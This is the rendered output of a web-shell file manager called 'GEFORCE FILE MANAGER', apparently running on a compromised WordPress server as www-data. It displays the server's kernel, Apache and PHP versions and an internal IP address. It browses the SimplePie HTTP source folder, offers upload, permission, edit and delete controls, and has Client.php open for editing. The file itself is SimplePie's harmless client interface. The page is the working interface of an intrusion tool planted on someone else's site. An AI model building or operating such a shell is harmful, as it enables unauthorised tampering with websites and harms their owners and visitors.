[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-includes
/
SimplePie
/
src
/
HTTP
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 Client.php
607 B
SET
[ EDIT ]
|
[ DEL ]
📄 ClientException.php
333 B
SET
[ EDIT ]
|
[ DEL ]
📄 FileClient.php
2,267 B
SET
[ EDIT ]
|
[ DEL ]
📄 Parser.php
15,209 B
SET
[ EDIT ]
|
[ DEL ]
📄 Psr18Client.php
4,447 B
SET
[ EDIT ]
|
[ DEL ]
📄 Psr7Response.php
2,177 B
SET
[ EDIT ]
|
[ DEL ]
📄 RawTextResponse.php
2,071 B
SET
[ EDIT ]
|
[ DEL ]
📄 Response.php
6,941 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: Client.php
<?php // SPDX-FileCopyrightText: 2004-2023 Ryan Parman, Sam Sneddon, Ryan McCue // SPDX-License-Identifier: BSD-3-Clause declare(strict_types=1); namespace SimplePie\HTTP; /** * HTTP Client interface * * @internal */ interface Client { public const METHOD_GET = 'GET'; /** * send a request and return the response * * @param Client::METHOD_* $method * @param array<string, string> $headers * * @throws ClientException if anything goes wrong requesting the data */ public function request(string $method, string $url, array $headers = []): Response; }